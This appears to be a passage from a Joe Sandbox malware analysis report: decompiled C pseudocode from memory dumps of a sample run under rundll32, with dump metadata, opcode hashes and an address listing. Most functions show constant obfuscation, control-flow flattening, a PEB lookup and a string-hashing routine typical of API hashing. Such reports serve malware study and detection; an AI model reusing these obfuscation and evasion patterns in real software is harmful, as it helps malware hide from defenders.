                                                                                                                                    				_v20 = _v20 << 0xd;
                                                                                                                                    				_v20 = _v20 >> 0xb;
                                                                                                                                    				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                                    				do {
                                                                                                                                    					while(_t97 != 0xfe6f9f) {
                                                                                                                                    						if(_t97 == 0x2f82a60) {
                                                                                                                                    							_push(_t88);
                                                                                                                                    							_push(_t88);
                                                                                                                                    							_t82 = E002C474B();
                                                                                                                                    							_t99 =  &(_t99[2]);
                                                                                                                                    							_t97 = 0x6e030e4;
                                                                                                                                    							_t96 = _t96 + _t82;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t97 != 0x6e030e4) {
                                                                                                                                    								goto L8;
                                                                                                                                    							} else {
                                                                                                                                    								_t96 = _t96 + E002DC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L5:
                                                                                                                                    						return _t96;
                                                                                                                                    					}
                                                                                                                                    					_t97 = 0x2f82a60;
                                                                                                                                    					L8:
                                                                                                                                    				} while (_t97 != 0xea6061f);
                                                                                                                                    				goto L5;
                                                                                                                                    			}


















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                    • Instruction ID: 83b385754b8ba509f5c55f8a76ac9bda2ccd012d33c7d5f530e46eda786101e0
                                                                                                                                    • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                    • Instruction Fuzzy Hash: 183147725083028BC314CF25D58540BFBE1BBD8798F108A1DF599A7221D3B5DA59CB97
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002C8969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				void* _t84;
                                                                                                                                    				signed int _t99;
                                                                                                                                    				signed int _t103;
                                                                                                                                    				void* _t109;
                                                                                                                                    				signed int _t110;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_t109 = __edx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t84);
                                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                                                                    				_v44 = 0x779abe;
                                                                                                                                    				_v20 = 0xb5573d;
                                                                                                                                    				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                                    				_t103 = 0x58;
                                                                                                                                    				_v20 = _v20 * 0x30;
                                                                                                                                    				_v20 = _v20 ^ 0x328c396d;
                                                                                                                                    				_v16 = 0x362481;
                                                                                                                                    				_v16 = _v16 + 0x16cb;
                                                                                                                                    				_v16 = _v16 | 0xfe676eb4;
                                                                                                                                    				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                                    				_v32 = 0xc91798;
                                                                                                                                    				_v32 = _v32 * 0x65;
                                                                                                                                    				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                                    				_v28 = 0xb97254;
                                                                                                                                    				_v28 = _v28 / _t103;
                                                                                                                                    				_v28 = _v28 ^ 0x000673a7;
                                                                                                                                    				_v12 = 0xb6c56;
                                                                                                                                    				_v12 = _v12 * 0x2a;
                                                                                                                                    				_v12 = _v12 << 1;
                                                                                                                                    				_v12 = _v12 * 0x5b;
                                                                                                                                    				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                                    				_v8 = 0x1f2e02;
                                                                                                                                    				_v8 = _v8 * 0x66;
                                                                                                                                    				_v8 = _v8 * 0x79;
                                                                                                                                    				_v8 = _v8 + 0xffff535b;
                                                                                                                                    				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                                    				_v24 = 0x692813;
                                                                                                                                    				_v24 = _v24 >> 0xb;
                                                                                                                                    				_v24 = _v24 + 0xffffcb9d;
                                                                                                                                    				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                                    				E002DD25E(_t103);
                                                                                                                                    				_v16 = 0x87422f;
                                                                                                                                    				_v16 = _v16 | 0xfc58150b;
                                                                                                                                    				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                                    				_v20 = 0xc6266d;
                                                                                                                                    				_v20 = _v20 << 0xa;
                                                                                                                                    				_v20 = _v20 + 0xffff7638;
                                                                                                                                    				_v20 = _v20 ^ 0x18992a28;
                                                                                                                                    				_t99 = E002D0AE0(_v20, _v16);
                                                                                                                                    				_push(_v24);
                                                                                                                                    				_t110 = _t99;
                                                                                                                                    				_push(_t109);
                                                                                                                                    				_push(_t110);
                                                                                                                                    				_push(1);
                                                                                                                                    				E002C80E3(_v12, _v8);
                                                                                                                                    				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                                    				return 0;
                                                                                                                                    			}



















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                    • Instruction ID: 89f4d669621dca268c4a58f67db26edc8b777426a49b10e226efcba83ddb0e8b
                                                                                                                                    • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                    • Instruction Fuzzy Hash: 4941DD71C1121AEBCF18CFE5C98A9EEBFB0FB44314F108189D525AA260D3B95B55CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DDBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				void* _t74;
                                                                                                                                    				char* _t82;
                                                                                                                                    				signed int _t84;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t82 = __edx;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t74);
                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                    				_v28 = 0x71ca23;
                                                                                                                                    				_v24 = 0x57f692;
                                                                                                                                    				_v12 = 0xd3252c;
                                                                                                                                    				_v12 = _v12 + 0x4351;
                                                                                                                                    				_v12 = _v12 + 0xffff5b79;
                                                                                                                                    				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                                    				_v8 = 0xbb067e;
                                                                                                                                    				_t84 = 0x11;
                                                                                                                                    				_v8 = _v8 / _t84;
                                                                                                                                    				_v8 = _v8 >> 8;
                                                                                                                                    				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                    				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                    				_v8 = 0xab60c2;
                                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                                    				_v8 = _v8 ^ 0x910d5570;
                                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                                    				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                    				if( *__edx != 0) {
                                                                                                                                    					do {
                                                                                                                                    						_v8 = 0xbb067e;
                                                                                                                                    						_v8 = _v8 / _t84;
                                                                                                                                    						_v8 = _v8 >> 8;
                                                                                                                                    						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                    						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                    						_v8 = 0xab60c2;
                                                                                                                                    						_v8 = _v8 << 0x10;
                                                                                                                                    						_v8 = _v8 ^ 0x910d5570;
                                                                                                                                    						_v8 = _v8 >> 4;
                                                                                                                                    						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                    						_v12 =  *_t82;
                                                                                                                                    						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                    						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                    						_v12 = _v12 - _v12;
                                                                                                                                    						_t82 = _t82 + 1;
                                                                                                                                    						_t84 = 0x11;
                                                                                                                                    					} while ( *_t82 != 0);
                                                                                                                                    				}
                                                                                                                                    				return _v12;
                                                                                                                                    			}













                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                    • Instruction ID: 8e1bdf85c11b826a840483d37e7fdc64acf280a66e405389517163baf6cb3c7c
                                                                                                                                    • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                    • Instruction Fuzzy Hash: 96311FB1D12348EBDF06DFA8CA4A2DEBBB0EF44314F208099D501A7265D3B14B98EF40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C9011(void* __ecx, signed int __edx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				intOrPtr _t75;
                                                                                                                                    				intOrPtr _t80;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				signed int _t89;
                                                                                                                                    
                                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                                    				_v44 = 0xa2b624;
                                                                                                                                    				_v8 = 0x99eb9;
                                                                                                                                    				_t88 = __edx;
                                                                                                                                    				_v8 = _v8 * 0x25;
                                                                                                                                    				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                                    				_v8 = _v8 << 5;
                                                                                                                                    				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                                    				_v24 = 0x77b72d;
                                                                                                                                    				_v24 = _v24 << 1;
                                                                                                                                    				_v24 = _v24 ^ 0x00e56894;
                                                                                                                                    				_v20 = 0x2ce6cf;
                                                                                                                                    				_v20 = _v20 >> 6;
                                                                                                                                    				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                                    				_v32 = 0xab4cd;
                                                                                                                                    				_v32 = _v32 >> 0xc;
                                                                                                                                    				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                                    				_v28 = 0x1f3eea;
                                                                                                                                    				_v28 = _v28 >> 9;
                                                                                                                                    				_v28 = _v28 ^ 0x0004326d;
                                                                                                                                    				_v12 = 0xc1e4f9;
                                                                                                                                    				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                                    				_v12 = _v12 + 0xcc91;
                                                                                                                                    				_v12 = _v12 >> 8;
                                                                                                                                    				_v12 = _v12 ^ 0x0038f912;
                                                                                                                                    				_v16 = 0x3b10d4;
                                                                                                                                    				_t89 = 0x6f;
                                                                                                                                    				_v16 = _v16 / _t89;
                                                                                                                                    				_v16 = _v16 + 0xffff4357;
                                                                                                                                    				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                                    				_v16 = _v16 ^ 0x074e6031;
                                                                                                                                    				_v36 = 0x1364c3;
                                                                                                                                    				_v36 = _v36 + 0x503c;
                                                                                                                                    				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                                    				_push(_v20);
                                                                                                                                    				_push(_v24);
                                                                                                                                    				_t75 = E002D5BFD(_v32, _v28, _v12, E002DDCF7(_v8, __ecx, _v36));
                                                                                                                                    				_t80 =  *0x2e3df8; // 0x0
                                                                                                                                    				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                                    				return E002CA8B0(_v16, _t74, _v36);
                                                                                                                                    			}


















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 57a81acb90cffb89b17f3099a0a3527f3f865039e4a819be3adb5c561134a28e
                                                                                                                                    • Instruction ID: 9460b7f419bce60344db4502ebf4e31e66148bd37701303b874a068503a87f6c
                                                                                                                                    • Opcode Fuzzy Hash: 57a81acb90cffb89b17f3099a0a3527f3f865039e4a819be3adb5c561134a28e
                                                                                                                                    • Instruction Fuzzy Hash: 4431F071D0121EEBCF48EFA5D94A4EEBBB1FF44318F208199D421B6250D7B90A59DF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002C7FF2(void* __edx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				signed int _t67;
                                                                                                                                    				void* _t73;
                                                                                                                                    
                                                                                                                                    				_v32 = _v32 & 0x00000000;
                                                                                                                                    				_v40 = 0xdad9ef;
                                                                                                                                    				_v36 = 0x9bb390;
                                                                                                                                    				_v28 = 0x653306;
                                                                                                                                    				_v28 = _v28 + 0xffff1628;
                                                                                                                                    				_v28 = _v28 >> 3;
                                                                                                                                    				_v28 = _v28 ^ 0x000c892d;
                                                                                                                                    				_v12 = 0x5dd1e8;
                                                                                                                                    				_v12 = _v12 ^ 0xb170c383;
                                                                                                                                    				_v12 = _v12 | 0x2785cc64;
                                                                                                                                    				_v12 = _v12 >> 5;
                                                                                                                                    				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                                    				_v8 = 0x56f6d9;
                                                                                                                                    				_v8 = _v8 + 0xc121;
                                                                                                                                    				_t73 = __edx;
                                                                                                                                    				_t67 = 0x41;
                                                                                                                                    				_v8 = _v8 / _t67;
                                                                                                                                    				_v8 = _v8 << 7;
                                                                                                                                    				_v8 = _v8 ^ 0x00a76089;
                                                                                                                                    				_v24 = 0xf5edfd;
                                                                                                                                    				_v24 = _v24 | 0x2f446a90;
                                                                                                                                    				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                                    				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                                    				_v20 = 0xafa903;
                                                                                                                                    				_v20 = _v20 + 0xffff9fdf;
                                                                                                                                    				_v20 = _v20 ^ 0xafba618c;
                                                                                                                                    				_v20 = _v20 ^ 0xaf136809;
                                                                                                                                    				_v16 = 0x74f1b4;
                                                                                                                                    				_v16 = _v16 >> 7;
                                                                                                                                    				_v16 = _v16 | 0x7bde77db;
                                                                                                                                    				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                                    				return E002C1E22(_v28, _v24, _t73, E002C1DB9(_t67), _v20, _v16);
                                                                                                                                    			}















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                    • Instruction ID: 06452b56f0a775ddce52bf7e4a86fd3e080cc0dfad0f6a874b4cc6a17bfef306
                                                                                                                                    • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                    • Instruction Fuzzy Hash: 2921EFB2C0131EEBCB48DFE5D94A5EEFBB0BB11314F208189D512B2264C3B40B598F91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D4087() {
                                                                                                                                    
                                                                                                                                    				return  *[fs:0x30];
                                                                                                                                    			}



                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				void* __ebp;
                                                                                                                                    				signed int _t73;
                                                                                                                                    				struct HINSTANCE__* _t78;
                                                                                                                                    				_Unknown_base(*)()* _t79;
                                                                                                                                    				struct HINSTANCE__* _t81;
                                                                                                                                    				signed int _t92;
                                                                                                                                    				signed int _t94;
                                                                                                                                    				unsigned int _t97;
                                                                                                                                    				void* _t113;
                                                                                                                                    				unsigned int _t115;
                                                                                                                                    				signed short _t123;
                                                                                                                                    				unsigned int _t124;
                                                                                                                                    				_Unknown_base(*)()* _t131;
                                                                                                                                    				signed short _t133;
                                                                                                                                    				unsigned int _t134;
                                                                                                                                    				intOrPtr _t143;
                                                                                                                                    				void* _t144;
                                                                                                                                    				int _t145;
                                                                                                                                    				int _t146;
                                                                                                                                    				signed int _t164;
                                                                                                                                    				void* _t167;
                                                                                                                                    				signed int _t169;
                                                                                                                                    				void* _t170;
                                                                                                                                    				int _t172;
                                                                                                                                    				signed int _t176;
                                                                                                                                    				void* _t177;
                                                                                                                                    				CHAR* _t181;
                                                                                                                                    				void* _t183;
                                                                                                                                    				void* _t184;
                                                                                                                                    
                                                                                                                                    				_t167 = __edx;
                                                                                                                                    				_t184 = _t183 - 0x118;
                                                                                                                                    				_t181 = _t184 - 4;
                                                                                                                                    				_t73 =  *0x100545cc; // 0x67083a02
                                                                                                                                    				_t181[0x118] = _t73 ^ _t181;
                                                                                                                                    				_push(0x58);
                                                                                                                                    				E10030D27(E10043F3E, __ebx, __edi, __esi);
                                                                                                                                    				_t169 = 0;
                                                                                                                                    				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                                    				 *(_t181 - 0x14) = 0;
                                                                                                                                    				 *(_t181 - 0x10) = 0;
                                                                                                                                    				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                                    				 *(_t181 - 0x18) = _t78;
                                                                                                                                    				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                    					if(GetVersion() >= 0) {
                                                                                                                                    						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                                    						if(_t81 != 0) {
                                                                                                                                    							 *(_t181 - 0x14) = 0;
                                                                                                                                    							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
                                                                                                                                    							if( *(_t181 - 0x14) != 0) {
                                                                                                                                    								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                                    								_t145 = _t97 & 0x3ff;
                                                                                                                                    								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                                    								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                                    								 *(_t181 - 0x10) = 2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						 *(_t181 - 0x18) = 0;
                                                                                                                                    						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                                    							 *(_t181 - 0x44) = 0x10;
                                                                                                                                    							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                                    								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                                    								_t184 = _t184 + 0xc;
                                                                                                                                    								if(_t113 == 1) {
                                                                                                                                    									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                    									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                    									_t146 = _t115 & 0x3ff;
                                                                                                                                    									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                                    									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                                    									 *(_t181 - 0x10) = 2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							RegCloseKey( *(_t181 - 0x18));
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                                    					 *(_t181 - 0x14) = _t123;
                                                                                                                                    					_t124 = _t123 & 0x0000ffff;
                                                                                                                                    					_t164 = _t124 & 0x3ff;
                                                                                                                                    					 *(_t181 - 0x1c) = _t164;
                                                                                                                                    					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                                    					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                                    					 *(_t181 - 0x10) = 2;
                                                                                                                                    					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                                    					if(_t131 != 0) {
                                                                                                                                    						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                                    						 *(_t181 - 0x14) = _t133;
                                                                                                                                    						_t134 = _t133 & 0x0000ffff;
                                                                                                                                    						_t172 = _t134 & 0x3ff;
                                                                                                                                    						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                                    						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                                    						 *(_t181 - 0x10) = 4;
                                                                                                                                    					}
                                                                                                                                    					_t169 = 0;
                                                                                                                                    				}
                                                                                                                                    				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                                    				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                                    				_t181[0x105] = 0;
                                                                                                                                    				_t181[0x104] = 0;
                                                                                                                                    				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                                    					_t143 = 0x20;
                                                                                                                                    					E10030030(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                                    					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                                    					 *(_t181 - 0x5c) = _t181;
                                                                                                                                    					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                                    					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                                    					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                                    					E10014538(_t181 - 0x3c, 0xffffffff);
                                                                                                                                    					 *(_t181 - 4) = _t169;
                                                                                                                                    					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                                    						E1001461E(_t181 - 0x3c);
                                                                                                                                    					}
                                                                                                                                    					_t176 = 0;
                                                                                                                                    					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                                    						L23:
                                                                                                                                    						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                                    						E10014C3E(_t181 - 0x3c);
                                                                                                                                    						_t92 = _t169;
                                                                                                                                    						goto L24;
                                                                                                                                    					} else {
                                                                                                                                    						while(1) {
                                                                                                                                    							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
                                                                                                                                    							if(_t94 != _t169) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t176 =  &(1[_t176]);
                                                                                                                                    							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							goto L23;
                                                                                                                                    						}
                                                                                                                                    						_t169 = _t94;
                                                                                                                                    						goto L23;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t92 = 0;
                                                                                                                                    					L24:
                                                                                                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                                    					_pop(_t170);
                                                                                                                                    					_pop(_t177);
                                                                                                                                    					_pop(_t144);
                                                                                                                                    					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x10014ee5
                                                                                                                                    0x10014ef0
                                                                                                                                    0x10014f06
                                                                                                                                    0x10014f15
                                                                                                                                    0x10014f2d
                                                                                                                                    0x10014f32
                                                                                                                                    0x10014f38
                                                                                                                                    0x10014f44
                                                                                                                                    0x10014f47
                                                                                                                                    0x10014f59
                                                                                                                                    0x10014f65
                                                                                                                                    0x10014f6a
                                                                                                                                    0x10014f6d
                                                                                                                                    0x10014f6d
                                                                                                                                    0x10014f38
                                                                                                                                    0x10014f77
                                                                                                                                    0x10014f77
                                                                                                                                    0x10014ef0
                                                                                                                                    0x10014e03
                                                                                                                                    0x10014e0b
                                                                                                                                    0x10014e0e
                                                                                                                                    0x10014e11
                                                                                                                                    0x10014e23
                                                                                                                                    0x10014e2c
                                                                                                                                    0x10014e34
                                                                                                                                    0x10014e41
                                                                                                                                    0x10014e44
                                                                                                                                    0x10014e4b
                                                                                                                                    0x10014e4f
                                                                                                                                    0x10014e53
                                                                                                                                    0x10014e56
                                                                                                                                    0x10014e59
                                                                                                                                    0x10014e66
                                                                                                                                    0x10014e72
                                                                                                                                    0x10014e77
